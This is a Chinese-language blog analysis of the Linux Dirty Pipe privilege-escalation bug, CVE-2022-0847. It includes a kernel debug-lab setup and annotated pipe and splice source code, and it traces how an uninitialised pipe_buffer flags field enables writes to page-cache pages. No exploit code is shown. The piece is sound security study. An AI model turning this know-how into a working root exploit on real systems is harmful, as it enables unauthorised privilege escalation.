Linux Dirty Pipe CVE-2022-0847 漏洞分析

Dirty Pipe 漏洞是 Linux 系统中的一个内核提权漏洞，漏洞危害堪比 Dirty COW，但相对于 Dirty COW 来说更加容易利用。

漏洞影响范围：pipe: merge anon_pipe_buf*_ops - linux commit （v5.8-rc1） ~ lib/iov_iter: initialize “flags” in new pipe_buffer（v5.17-rc6）

时间范围大概是 2020/5/21 - 2022/2/21。

二、环境搭建

参照先前的 Linux pwn 环境搭建笔记来搭建出一个带有漏洞的 linux 环境。这里使用的 commit id 为 f6dd975583bd8ce088400648fd9819e4691c8958。

简单贴几个脚本：

几个关键文件夹的位置关系：

linux/busybox-1.34.1/_install：busybox 文件系统位置

linux/myfolder：存放 exp 等需要复制进 VM 的文件

启动 linux 脚本：

#! /bin/bash

# 判断当前权限是否为 root，需要高权限以执行 gef-remote --qemu-mode
user=$(env | grep "^USER" | cut -d "=" -f 2)
if [ "$user" != "root"  ]
  then
    echo "请使用 root 权限执行"
    exit
fi

# 编译 POC
g++ ./myfolder/poc.c -o ./myfolder/poc -static
# 复制文件至 rootfs
cp ./myfolder/* busybox-1.34.1/_install

# 构建 rootfs
pushd busybox-1.34.1/_install
find . | cpio -o --format=newc > ../../rootfs.img
popd

gnome-terminal -e 'gdb -x mygdbinit'

# 启动 qemu
qemu-system-x86_64 \
    -kernel ./arch/x86/boot/bzImage \
    -initrd ./rootfs.img \
    -append "nokaslr" \
    -m 2G \
    -s  \
    -S \
    -nographic -append "console=ttyS0"

gdbinit：

set architecture i386:x86-64
add-symbol-file vmlinux
gef-remote --qemu-mode localhost:1234

# b start_kernel
c

启动 qemu 时报了一个错：

这是因为先前启动 qemu 时忘记指定内存 -m 了，加个 -m 2G 分配 2G 的内存给 qemu 即可。

三、代码浅析

在分析漏洞之前，我们需要熟悉一下该漏洞所涉及的代码片段，也算是顺便熟悉一下 pipe 机制的实现。

这里将涉及 commit f6dd97 中的几个文件：

include/linux/pipe_fs_i.h
fs/pipe.c
fs/splice.c
lib/iov_iter.c

1. pipe 相关结构体

a. pipe_inode_info

pipe_inode_info 结构体存放了 pipe 机制所要用到的字段：

/**
 *  struct pipe_inode_info - a linux kernel pipe
 *  @mutex: mutex protecting the whole thing
 *  @rd_wait: reader wait point in case of empty pipe
 *  @wr_wait: writer wait point in case of full pipe
 *  @head: The point of buffer production
 *  @tail: The point of buffer consumption
 *  @max_usage: The maximum number of slots that may be used in the ring
 *  @ring_size: total number of buffers (should be a power of 2)
 *  @tmp_page: cached released page
 *  @readers: number of current readers of this pipe
 *  @writers: number of current writers of this pipe
 *  @files: number of struct file referring this pipe (protected by ->i_lock)
 *  @r_counter: reader counter
 *  @w_counter: writer counter
 *  @fasync_readers: reader side fasync
 *  @fasync_writers: writer side fasync
 *  @bufs: the circular array of pipe buffers
 *  @user: the user who created this pipe
 **/
struct pipe_inode_info {
    struct mutex mutex;
    wait_queue_head_t rd_wait, wr_wait;
    unsigned int head;
    unsigned int tail;
    unsigned int max_usage;
    unsigned int ring_size;
    unsigned int readers;
    unsigned int writers;
    unsigned int files;
    unsigned int r_counter;
    unsigned int w_counter;
    struct page *tmp_page;
    struct fasync_struct *fasync_readers;
    struct fasync_struct *fasync_writers;
    struct pipe_buffer *bufs;
    struct user_struct *user;
};

这个结构体麻雀虽小五脏俱全，该有的都有，包括等待写入/读取该管道的队列、管道大小、存放具体内存的指针数组等等。

pipe 存放数据使用的是环形队列，即在定长大小的数据环（pipe buf ring）上，尽可能的存储数据；因此这里需要简单强调一下一些字段的用途：

head：标注队列首部的索引，注意这里的索引单位是一个 pipe_buffer。head 为接下来要写入的位置。

tail：标注队列尾部的索引，tail 为接下来要读取的位置。

上面两个字段的关系有点类似这样：

low addr                                 high addr
+--------------------------------------------+
|  |  |  |  |  |  |  | >|//|//|//|> |  |  |  |
+--------------------------------------------+
                       A   ---->   A
                       |           |
                     tail         head

无论是 head 还是 tail，它们都指向没写满的 pipe_buffer（有点类似 STL 的 end 方法）。

max_usage：最大可用的 pipe_buffer 个数，这个字段约束了整个 pipe 所能容纳的数据大小。
ring_size：当前已分配的 pipe_buffer 个数，注意该值必须为2的幂。
files：结构体 file 引用至该管道的个数。这个有点类似某个管道被 dup 出多个 fd 一样。
tmp_page：缓存先前被释放的 page，这个 page 可以被重用以降低重分配开销。
bufs：实际存放多个 pipe_buffer 的数组，在设计上我们需要将该一维数组看作一个环。

b. pipe_buffer

接下来我们简单深入一下结构体 pipe_buffer，该结构体存放着实际管道中存放的数据：

/**
 *  struct pipe_buffer - a linux kernel pipe buffer
 *  @page: the page containing the data for the pipe buffer
 *  @offset: offset of data inside the @page
 *  @len: length of data inside the @page
 *  @ops: operations associated with this buffer. See @pipe_buf_operations.
 *  @flags: pipe buffer flags. See above.
 *  @private: private data owned by the ops.
 **/
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

这个结构体存放了包括页引用、页偏移、数据大小等关键信息。这里的 flag 共有这几种：

// include/linux/pipe_fs_i.h
#define PIPE_BUF_FLAG_LRU       0x01    /* page is on the LRU */
#define PIPE_BUF_FLAG_ATOMIC    0x02    /* was atomically mapped */
#define PIPE_BUF_FLAG_GIFT      0x04    /* page is a gift */
#define PIPE_BUF_FLAG_PACKET    0x08    /* read() as a packet */
#define PIPE_BUF_FLAG_CAN_MERGE 0x10    /* can merge buffers */

我们可以暂时不用去管这几种 flag 具体的意思。

c. iov_iter

结构体 iov_iter 用于迭代那种被分为多个页的数据，换句话说，该结构体将用于迭代一个个页面。其结构体如下所示：

enum iter_type {
    /* iter types */
    ITER_IOVEC = 4,
    ITER_KVEC = 8,
    ITER_BVEC = 16,
    ITER_PIPE = 32,    // 表示正在迭代的数据是位于 pipe 中的
    ITER_DISCARD = 64,
};

struct iov_iter {
    /*
     * Bit 0 is the read/write bit, set if we're writing.
     * Bit 1 is the BVEC_FLAG_NO_REF bit, set if type is a bvec and
     * the caller isn't expecting to drop a page reference when done.
     */
    unsigned int type;
    size_t iov_offset;
    size_t count;
    union {
        const struct iovec *iov;
        const struct kvec *kvec;
        const struct bio_vec *bvec;
        struct pipe_inode_info *pipe;
    };
    union {
        unsigned long nr_segs;
        struct {
            unsigned int head;
            unsigned int start_head;
        };
    };
};

其中，一些字段的意义如下：

type：表示当前迭代的数据是来自于什么结构，例如：
- ITER_PIPE 表示当前迭代的数据为某个 pipe 中的页数据
- ITER_DISCARD 表示写入当前 iov_iter 的数据全部丢弃。
后续针对 iov_iter 做内存读写时，会根据这个 type 来执行不同类型的内存读写操作。
iov_offset：当前所迭代到 page 的相对偏移，读写将从该 page 的这个相对偏移开始。
cout：可读写的数组字节大小

2. pipe_read 函数

pipe_read 函数位于 fs/pipe.c 中，当内核需要从某个管道中读取数据时便会调用该函数：

const struct file_operations pipefifo_fops = {
    .open             = fifo_open,
    .llseek           = no_llseek,
    .read_iter        = pipe_read,     // read
    .write_iter       = pipe_write,    // write
    .poll             = pipe_poll,
    .unlocked_ioctl   = pipe_ioctl,
    .release          = pipe_release,
    .fasync           = pipe_fasync,
};

首先，该函数声明如下：

static ssize_t
pipe_read(struct kiocb *iocb, struct iov_iter *to)

这些结构体我们可以不用记住，只需简单知道：

iocb：中存放着获取当前 pipe 结构体的指针
to：从管道读出来的数据将要写入的地方，iov_iter 迭代器类型。

接下来，内核从 to 中获取待读取的大小，并从 iocb 中获取 pipe_inode_info 结构体；如果待读取大小为 0 则直接返回：

size_t total_len = iov_iter_count(to);
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
bool was_full, wake_next_reader = false;
ssize_t ret;

/* Null read succeeds. */
if (unlikely(total_len == 0))
    return 0;

ret = 0;
__pipe_lock(pipe);

接下来，kernel 尝试判断 pipe 是否已满，如果满了则设置 was_full 标志：

was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);

虽然这个标志对我们理解主要逻辑没有太大的影响，但这里提起它是为了看看 pipe 是如何判断是否已满的：

/**
 * pipe_occupancy - Return number of slots used in the pipe
 * @head: The pipe ring head pointer
 * @tail: The pipe ring tail pointer
 */
static inline unsigned int pipe_occupancy(unsigned int head, unsigned int tail)
{
    return head - tail;
}

/**
 * pipe_full - Return true if the pipe is full
 * @head: The pipe ring head pointer
 * @tail: The pipe ring tail pointer
 * @limit: The maximum amount of slots available.
 */
static inline bool pipe_full(unsigned int head, unsigned int tail,
                 unsigned int limit)
{
    return pipe_occupancy(head, tail) >= limit;
}

可以看到，如果 pipe->head - pipe->tail >= pipe->max_usage，则说明 pipe 数据区已满。相对的，判断 pipe 是否为空也很简单：

/**
 * pipe_empty - Return true if the pipe is empty
 * @head: The pipe ring head pointer
 * @tail: The pipe ring tail pointer
 */
static inline bool pipe_empty(unsigned int head, unsigned int tail)
{
    return head == tail;
}

回到 pipe_read 函数，接下来 kernel 将循环读取 pipe：

for (;;) {
    unsigned int head = pipe->head;
    unsigned int tail = pipe->tail;
    // 注意 pipe->ring_size 为 2的幂，因此 ring_size-1 转成二进制为 0b1111...111
    unsigned int mask = pipe->ring_size - 1;
    // 如果管道中存在数据
    if (!pipe_empty(head, tail)) {
        // 获取 head 所对应的 pipe_buffer，注意 head 的范围可以大于 max_usage，因为整个 pipe_buffer 的设计就是把它当作一个环
        struct pipe_buffer *buf = &pipe->bufs[tail & mask];
        // 获取当前读取的 buf 数据大小
        size_t chars = buf->len;
        size_t written;
        int error;

// 如果当前可读取的 buf 大小大于 需要读入的大小，则截断
        if (chars > total_len)
            chars = total_len;
        // 调用 pipe_buf 的 confirm 方法，确保 pipe buffer 中的数据有效
        error = pipe_buf_confirm(pipe, buf);
        if (error) {
            if (!ret)
                ret = error;
            break;
        }

// 将当前 pipe buffer 所对应的内存页，写入 to 中
        written = copy_page_to_iter(buf->page, buf->offset, chars, to);
        // 如果写入大小 < 可写大小，则说明在写入数据时出现不可恢复的错误，直接返回
        if (unlikely(written < chars)) {
            if (!ret)
                ret = -EFAULT;
            break;
        }
        // 一轮读取完成，如果带读取大小仍然不为0，则准备继续循环读取
        ret += chars;
        buf->offset += chars;
        buf->len -= chars;

/* Was it a packet buffer? Clean up and exit */
        // 若引用该 pipe 的 fd 设置了 O_DIRECT 标志，这个标志可以在 pipe_write 函数中看看是怎么使用的
        if (buf->flags & PIPE_BUF_FLAG_PACKET) {
            total_len = chars;
            buf->len = 0;
        }
        // 如果当前 pipe buffer 已经全部读取完成，则更新 tail 至下一个 pipe buffer
        if (!buf->len) {
            pipe_buf_release(pipe, buf);
            spin_lock_irq(&pipe->rd_wait.lock);
            tail++;
            pipe->tail = tail;
            spin_unlock_irq(&pipe->rd_wait.lock);
        }
        total_len -= chars;
        // 如果正常读取完，则直接返回
        if (!total_len)
            break;    /* common path: read succeeded */
        // 如果还需要读取数据，并且管道里确实还有数据，则循环读取
        if (!pipe_empty(head, tail))    /* More to do? */
            continue;
    }

if (!pipe->writers)
        break;
    if (ret)
        break;
    if (filp->f_flags & O_NONBLOCK) {
        ret = -EAGAIN;
        break;
    }
    __pipe_unlock(pipe);

/*
         * We only get here if we didn't actually read anything.
         * ...
         */
    ...;
}
...;

return ret;

3. copy_page_to_iter 相关

从函数 pipe_buffer 的注释中可以得知大致的读取 pipe 的流程。其中 copy_page_to_iter 函数会根据变量 to 的内部字段 type 来选择执行不同的操作：

不过总体上的功能，还是将传入的 page 复制进 iov_iter 所指向的位置。

// include/linux/uio.h
static __always_inline __must_check
size_t copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i)
{
    if (unlikely(!check_copy_size(addr, bytes, true)))
        return 0;
    else
        return _copy_to_iter(addr, bytes, i);
}

// lib/iov_iter.c
size_t copy_page_to_iter(struct page *page, size_t offset, size_t bytes,
             struct iov_iter *i)
{
    // 判断数据读写是否越界，通常这个 check 肯定是可以通过的
    if (unlikely(!page_copy_sane(page, offset, bytes)))
        return 0;
    if (i->type & (ITER_BVEC|ITER_KVEC)) {
        void *kaddr = kmap_atomic(page);
        size_t wanted = copy_to_iter(kaddr + offset, bytes, i);
        kunmap_atomic(kaddr);
        return wanted;
    } else if (unlikely(iov_iter_is_discard(i)))
        return bytes;
    else if (likely(!iov_iter_is_pipe(i))) 
        return copy_page_to_iter_iovec(page, offset, bytes, i);
    else // (i->type & ~(READ | WRITE)) == ITER_PIPE
        return copy_page_to_iter_pipe(page, offset, bytes, i);
}

这里我们只关注当 to 也为一个 pipe 时，数据是如何复制的，即 copy_page_to_iter_pipe 函数。整个函数其实很短：

static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
             struct iov_iter *i)
{
    // 获取待写入的 pipe 结构体
    struct pipe_inode_info *pipe = i->pipe;
    struct pipe_buffer *buf;
    // 获取待写入的 pipe 结构体的一些信息，例如 head、tail等等 
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head = i->head;
    size_t off;

// 这里是在做一些 check
    if (unlikely(bytes > i->count))
        bytes = i->count;

if (unlikely(!bytes))
        return 0;

if (!sanity(i))
        return 0;

// 获取待写入的相对偏移位置
    off = i->iov_offset;
    // 获取待接收数据的 pipe buf
    buf = &pipe->bufs[i_head & p_mask];
    if (off) {
        if (offset == off && buf->page == page) {
            /* merge with the last one */
            buf->len += bytes;
            i->iov_offset += bytes;
            goto out;
        }
        i_head++;
        buf = &pipe->bufs[i_head & p_mask];
    }
    // 如果待写入的管道已满，则直接返回
    if (pipe_full(i_head, p_tail, pipe->max_usage))
        return 0;

buf->ops = &page_cache_pipe_buf_ops;
    // 增加该页的 refcount
    get_page(page);
    buf->page = page;   // 直接引用已有的页
    buf->offset = offset;
    buf->len = bytes;

pipe->head = i_head + 1;
    i->iov_offset = offset + bytes;
    i->head = i_head;
out:
    i->count -= bytes;
    return bytes;
}

简单讲下其中的关键：对于 recv pipe buf 来说，当有新的 page 数据复制到 recv pipe buf 上时，recv pipe buf 将直接引用该页，并记录下当前复制的 offset、len 等等，以降低性能开销。如果每次复制的都是不同的页，那 recv pipe bufs 上存放的就是不同页的引用，其中每页的 offset 和 len 可能不会饱和。

注意：由于这里 pipe buf 是直接引用其他页，因此在 page_write 处必须确保新传来的数据不会写入这样的页面中，而这种保证就依赖于 MERGE 标志。

在这里我们可以看到一个有意思的事情：虽然 recv pipe buf 结构体上的众多字段都被重新赋值，但有一个字段却被遗漏了，那就是 flags 字段！

4. copy_to_iter 相关

除了 pipe_read 调用 copy_page_to_iter 函数，进而调用到 copy_page_to_iter 函数来传递数据至 pipe 以外，copy_to_iter 函数也可以用于 pipe 的数据传递：

static __always_inline __must_check
size_t copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i)
{
    if (unlikely(!check_copy_size(addr, bytes, true)))
        return 0;
    else
        return _copy_to_iter(addr, bytes, i);
}

size_t _copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i)
{
    const char *from = addr;
    if (unlikely(iov_iter_is_pipe(i))) // pipe case
        return copy_pipe_to_iter(addr, bytes, i);
    if (iter_is_iovec(i))
        might_fault();
    iterate_and_advance(i, bytes, v,
        copyout(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len),
        memcpy_to_page(v.bv_page, v.bv_offset,
                   (from += v.bv_len) - v.bv_len, v.bv_len),
        memcpy(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len)
    )

return bytes;
}

copy_to_iter 函数有很多个调用点，因此大概率存在某个调用点是通过 copy_to_iter 函数来向 pipe 中写入数据。这样一来控制流变可以通过 copy_to_iter-> _copy_to_iter -> copy_pipe_to_iter 来调用到真正执行数据拷贝的操作：

static size_t copy_pipe_to_iter(const void *addr, size_t bytes,
                struct iov_iter *i)
{
    // 获取 pipe 结构体
    struct pipe_inode_info *pipe = i->pipe;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head;
    size_t n, off;
    // 执行 check
    if (!sanity(i))
        return 0;

/*  从代码中可以推测该函数的功能：
        1. 获取可写入管道的大小（管道可能不够大）
        2. 准备待写入管道的一些 pipe_buf
        3. 获取当前管道的 head 位置
        4. 获取当前 pipe 可写页位置的相对偏移 off
    */
    // n 为待写入数据字节大小
    bytes = n = push_pipe(i, bytes, &i_head, &off);
    // 如果没有数据需要写入，则直接返回。通常这个分支不大可能会触发。
    if (unlikely(!n))
        return 0;
    // 循环写入管道，直到待写入的数据全部写完。每写一次时，要么写完一整页，要么没写完一页就直接退出
    do {
        // 获取单次可写入的大小
        size_t chunk = min_t(size_t, n, PAGE_SIZE - off);
        memcpy_to_page(pipe->bufs[i_head & p_mask].page, off, addr, chunk);
        i->head = i_head;
        i->iov_offset = off + chunk;
        n -= chunk;
        addr += chunk;
        off = 0;
        i_head++;
    } while (n);
    // 修改当前 iov_iter 待写入的大小
    i->count -= bytes;
    return bytes;
}

接下来我们再来看看函数 push_pipe，从上面的注解我们也可得知这个函数是比较重要的：

static size_t push_pipe(struct iov_iter *i, size_t size,
            int *iter_headp, size_t *offp)
{
    // 获取接收数据的 pipe
    struct pipe_inode_info *pipe = i->pipe;
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int iter_head;
    size_t off;
    ssize_t left;
    // 一些常规 check 暂且不表
    if (unlikely(size > i->count))
        size = i->count;
    if (unlikely(!size))
        return 0;

left = size;
    /* data_start 获取 pipe 的 head & 起始 offset。
       这个函数用于过滤 head 指向上一个未被分配的 pipe buf 或者 offset == PAGE_SIZE 的情况 */
    data_start(i, &iter_head, &off);
    *iter_headp = iter_head;
    *offp = off;
    // 如果当前是从某个页的中间位置开始写
    if (off) {
        // 判断这剩余半页够不够写
        left -= PAGE_SIZE - off;
        // 要是够写则直接返回
        if (left <= 0) {
            pipe->bufs[iter_head & p_mask].len += size;
            return size;
        }
        // 如果不够写则先把该可写的半页，扩充为可写的整页
        pipe->bufs[iter_head & p_mask].len = PAGE_SIZE;
        iter_head++;
    }
    // 到这里时，则循环扩充页
    while (!pipe_full(iter_head, p_tail, pipe->max_usage)) {
        // 循环获取 pipe_buffer，并初始化 pipe_buffer 结构体上的数据
        struct pipe_buffer *buf = &pipe->bufs[iter_head & p_mask];
        struct page *page = alloc_page(GFP_USER);
        if (!page)
            break;

buf->ops = &default_pipe_buf_ops;
        buf->page = page;
        buf->offset = 0;
        buf->len = min_t(ssize_t, left, PAGE_SIZE);
        left -= buf->len;
        /* !!! 需要注意的是，这里没有对 buf 的 flag 字段初始化！因此这里的 flag 字段将沿用旧的 pipe_buffer 的 flag*/
        iter_head++;
        pipe->head = iter_head;

if (left == 0)
            return size;
    }
    return size - left;
}

从 push_pipe 函数中我们可以看到，当 kernel 循环扩充 pipe_buffer 上的页时，这里也并没有初始化 pipe_buffer 的 flag 标志！又因为 pipe_buffer 在设计上便是一个环，因此在扩孔 pipe_buffer 时，这里也将重用先前 pipe_buffer 所设置的 flag。

这里简单总结一下 copy_page_to_iter 函数与 copy_to_iter 函数在复制数据进 pipe 时 所实现的差异：

前者是在一个完整 page 上，将数据复制给 pipe。因此 pipe buf 只需直接引用该页，并记录下 offset 和 len，即可完成复制操作。

后者不保证源数据在完整 page 上，而是提供了 addr 和 len，因此 pipe buf 需要自己准备存放数据的 page。

5. pipe_write 函数

这次我们只关注最精华的两部分，首先是 页合并：

head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
if (chars && !was_empty) {
    unsigned int mask = pipe->ring_size - 1;
    struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
    int offset = buf->offset + buf->len;

if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
        offset + chars <= PAGE_SIZE) {
        ret = pipe_buf_confirm(pipe, buf);
        if (ret)
            goto out;

ret = copy_page_from_iter(buf->page, offset, chars, from);
        if (unlikely(ret < chars)) {
            ret = -EFAULT;
            goto out;
        }

buf->len += ret;
        if (!iov_iter_count(from))
            goto out;
    }
}

如果说当前 pipe buf 中已经存在数据，并且本次待写入的数据可以被该 pipe buf 剩余空间所容纳，则本次写入的数据将直接写入该 pipe buf 中，与先前的 pipe buf 数据合并。这个合并操作需要 pipe buf 有 PIPE_BUF_FLAG_CAN_MERGE 标志，该标志只要 pipe_write 所对应的 fd 没有设置 O_DIRECT 标志即可自动设置。

其次是正常的页面写入逻辑：

for (;;) {
    // 如果一个管道没有读者，则说明管道已经被破坏，生成 SIGPIPE 信号
    if (!pipe->readers) {
        send_sig(SIGPIPE, current, 0);
        if (!ret)
            ret = -EPIPE;
        break;
    }
    // 尝试循环往管道内写入数据
    head = pipe->head;
    if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
        unsigned int mask = pipe->ring_size - 1;
        struct pipe_buffer *buf = &pipe->bufs[head & mask];
        struct page *page = pipe->tmp_page;
        int copied;
        // 获取先前被释放但是缓存起来的 tmp_page。
        // 如果存在 tmp_page 则在向 pipe buf 写入数据时就可直接重用而无需分配
        if (!page) {
            page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
            if (unlikely(!page)) {
                ret = ret ? : -ENOMEM;
                break;
            }
            pipe->tmp_page = page;
        }

/* Allocate a slot in the ring in advance and attach an
             * empty buffer.  If we fault or otherwise fail to use
             * it, either the reader will consume it or it'll still
             * be there for the next write.
             */
        spin_lock_irq(&pipe->rd_wait.lock);

head = pipe->head;
        if (pipe_full(head, pipe->tail, pipe->max_usage)) {
            spin_unlock_irq(&pipe->rd_wait.lock);
            continue;
        }

pipe->head = head + 1;
        spin_unlock_irq(&pipe->rd_wait.lock);

/* Insert it into the buffer array */
        // 往新的 pipe buf 中写入数据
        buf = &pipe->bufs[head & mask];
        buf->page = page;
        buf->ops = &anon_pipe_buf_ops; // 设置匿名管道操作
        buf->offset = 0;
        buf->len = 0;
        // 如果 fd 设置了 O_DIRECT，则每次写入时都会占用新的一页，而不会合并
        if (is_packetized(filp)) 
            buf->flags = PIPE_BUF_FLAG_PACKET;
        else
            buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
        pipe->tmp_page = NULL;
        // 复制页数据
        copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
        if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
            if (!ret)
                ret = -EFAULT;
            break;
        }
        ret += copied;
        buf->offset = 0;
        buf->len = copied;

if (!iov_iter_count(from))
            break;
    }

if (!pipe_full(head, pipe->tail, pipe->max_usage))
        continue;

/* Wait for buffer space to become available. */
    if (filp->f_flags & O_NONBLOCK) {
        if (!ret)
            ret = -EAGAIN;
        break;
    }
    if (signal_pending(current)) {
        if (!ret)
            ret = -ERESTARTSYS;
        break;
    }
    ...
}

这个 tmp_page 简单讲一下。如果该 pipe buf 所持有的 page 只有它自己持有，并且现在打算将其释放，那么 pipe buf 就私下不释放该 page，而是将其缓存起来供后续使用：

static void anon_pipe_buf_release(struct pipe_inode_info *pipe,
                  struct pipe_buffer *buf)
{
    struct page *page = buf->page;

/*
     * If nobody else uses this page, and we don't already have a
     * temporary page, let's keep track of it as a one-deep
     * allocation cache. (Otherwise just release our reference to it)
     */
    if (page_count(page) == 1 && !pipe->tmp_page)
        pipe->tmp_page = page;
    else
        put_page(page);
}

从 pipe 读写操作中我们可以得知，pipe bufs 存放的页面无非两种：

直接引用其他不变页（例如文件缓存页），这样就无需进行数据复制操作

自己创建页，需要进行数据复制

由 pipe 机制来保证存放在 pipe bufs 中的页数据，不会被 pipe 本身给覆写。同时注意只有在自己创建的页上，才能进行 Merge 操作。

6. do_splice 函数

Linux 库函数 splice 的作用是，将某个 fd 的数据不经过用户层，直接拷贝进另一个 fd 中。其函数声明如下：

#define _GNU_SOURCE         /* See feature_test_macros(7) */
#include <fcntl.h>

ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);

这里的 fd 只能有两种情况：pipe fd 或 file fd，因此在 do_splice 函数中，内核也会对 fd 的类型做特判，来执行不同的数据传递操作。

这里，我们只需关注 From-fd 为 file，To-fd 为 pipe ，即数据从文件传递至管道的情况：

/*
 * Determine where to splice to/from.
 */
long do_splice(struct file *in, loff_t __user *off_in,
        struct file *out, loff_t __user *off_out,
        size_t len, unsigned int flags)
{
    struct pipe_inode_info *ipipe;
    struct pipe_inode_info *opipe;
    loff_t offset;
    long ret;

ipipe = get_pipe_info(in);
    opipe = get_pipe_info(out);
    ...;

// 当数据从文件复制给管道时
    if (opipe) {
        ...
        // 等待 pipe 存在空闲空间
        if (out->f_flags & O_NONBLOCK)
            flags |= SPLICE_F_NONBLOCK;

pipe_lock(opipe);
        ret = wait_for_space(opipe, flags);
        // 如果等到 pipe 存在空闲空间后
        if (!ret) {
            unsigned int p_space;
             // 获取待传递数据大小
            /* Don't try to read more the pipe has space for. */
            p_space = opipe->max_usage - pipe_occupancy(opipe->head, opipe->tail);
            len = min_t(size_t, len, p_space << PAGE_SHIFT);
            // 执行真正的传递操作
            ret = do_splice_to(in, &offset, opipe, len, flags);
        }
        ...
        return ret;
    }

...
}

而在 do_splice_to 函数中，内核会根据文件系统类型，来调用对应的 splice_read 函数：

/*
 * Attempt to initiate a splice from a file to a pipe.
 */
static long do_splice_to(struct file *in, loff_t *ppos,
             struct pipe_inode_info *pipe, size_t len,
             unsigned int flags)
{
    int ret;

if (unlikely(!(in->f_mode & FMODE_READ)))
        return -EBADF;

ret = rw_verify_area(READ, in, ppos, len);
    if (unlikely(ret < 0))
        return ret;

if (unlikely(len > MAX_RW_COUNT))
        len = MAX_RW_COUNT;
    // 调用 splice_read 函数
    if (in->f_op->splice_read)
        return in->f_op->splice_read(in, ppos, pipe, len, flags);
    return default_file_splice_read(in, ppos, pipe, len, flags);
}

以 linux 中最常见的文件系统 ext4 为例，这是 ext4 文件系统中所设置的一些关键方法：

// fs/ext4/file.c
const struct file_operations ext4_file_operations = {
    ...
    .read_iter    = ext4_file_read_iter,
    ...
    .splice_read  = generic_file_splice_read,
    ...
};

因此最终 do_splice_to 函数会调用到 generic_file_splice_read 函数来执行数据传递：

/**
 * generic_file_splice_read - splice data from file to a pipe
 * @in:      file to splice from
 * @ppos:    position in @in
 * @pipe:    pipe to splice to
 * @len:     number of bytes to splice
 * @flags:   splice modifier flags
 *
 * Description:
 *    Will read pages from given file and fill them into a pipe. Can be
 *    used as long as it has more or less sane ->read_iter().
 *
 */
ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
                 struct pipe_inode_info *pipe, size_t len,
                 unsigned int flags)
{
    struct iov_iter to;
    struct kiocb kiocb;
    unsigned int i_head;
    int ret;

// 根据 pipe 结构体，创建 iov_iter 结构
    iov_iter_pipe(&to, READ, pipe, len);
    i_head = to.head;
    // 创建 kiocb 结构
    init_sync_kiocb(&kiocb, in);
    kiocb.ki_pos = *ppos;
    // 调用 call_read_iter 执行实际的数据传输操作 ！！！
    ret = call_read_iter(in, &kiocb, &to);
    // 如果数据正常传输
    if (ret > 0) {
        // 更新文件访问情况
        *ppos = kiocb.ki_pos;
        file_accessed(in);
    // 如果数据传输失败
    } else if (ret < 0) {
        to.head = i_head;
        to.iov_offset = 0;
        iov_iter_advance(&to, 0); /* to free what was emitted */
        /*
         * callers of ->splice_read() expect -EAGAIN on
         * "can't put anything in there", rather than -EFAULT.
         */
        if (ret == -EFAULT)
            ret = -EAGAIN;
    }

return ret;
}

从 generic_file_splice_read 函数的代码中可以看到，该函数最终会调用 call_read_iter 函数来做数据传递；而该函数又会调用特定于文件系统的 read_iter 函数：

static inline ssize_t call_read_iter(struct file *file, struct kiocb *kio,
                     struct iov_iter *iter)
{
    return file->f_op->read_iter(kio, iter);
}

从 ext4_file_operations 代码中可以得知，call_read_iter 函数调用到的是 ext4_file_read_iter 函数：

static ssize_t ext4_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
{
    struct inode *inode = file_inode(iocb->ki_filp);
    // 一些简单的判断
    if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
        return -EIO;

if (!iov_iter_count(to))
        return 0; /* skip atime */

#ifdef CONFIG_FS_DAX
    if (IS_DAX(inode))
        return ext4_dax_read_iter(iocb, to);
#endif
    if (iocb->ki_flags & IOCB_DIRECT)
        return ext4_dio_read_iter(iocb, to);
    // 没设置 O_DIRECT 的走这里
    return generic_file_read_iter(iocb, to);
}

然后该函数又调 generic_file_read_iter：

/**
 * generic_file_read_iter - generic filesystem read routine
 * @iocb:    kernel I/O control block
 * @iter:    destination for the data read
 *
 * This is the "read_iter()" routine for all filesystems
 * that can use the page cache directly.
 * Return:
 * * number of bytes copied, even for partial reads
 * * negative error code if nothing was read
 */
ssize_t
generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
    size_t count = iov_iter_count(iter);
    ssize_t retval = 0;

if (!count)
        goto out; /* skip atime */

if (iocb->ki_flags & IOCB_DIRECT) {
        ...
    }
    // 继续调用
    retval = generic_file_buffered_read(iocb, iter, retval);
out:
    return retval;
}

接着又调 generic_file_buffered_read函数。该函数代码量太大了我就不贴了，只简单讲讲其大致功能：

尝试在该文件已有的文件缓存映射表中查找先前已经映射的文件缓存页
- 如果没文件缓存，则读取磁盘上的文件数据，创建新的文件缓存。
- 如果有文件缓存但是缓存过期了，则更新这个文件缓存
到了这一步，此时是一定有文件缓存了。则调用 copy_page_to_iter 函数来将文件缓存页上的数据，拷贝进 pipe 中。

这个函数正是我们先前所介绍过的，因此整个 splice 系统调用，就可以和 pipe 那里的未初始化漏洞串起来了。

四、漏洞成因

这个漏洞并非一蹴而就，而是由两个 commit 的错误相互结合导致的：

new iov_iter flavour: pipe-backed - linux commit 241699：引入字段的未初始化漏洞。 push_pipe 和 copy_page_to_iter_pipe 两个函数在设置 pipe_buffer 结构体时均未初始化 flag 字段。

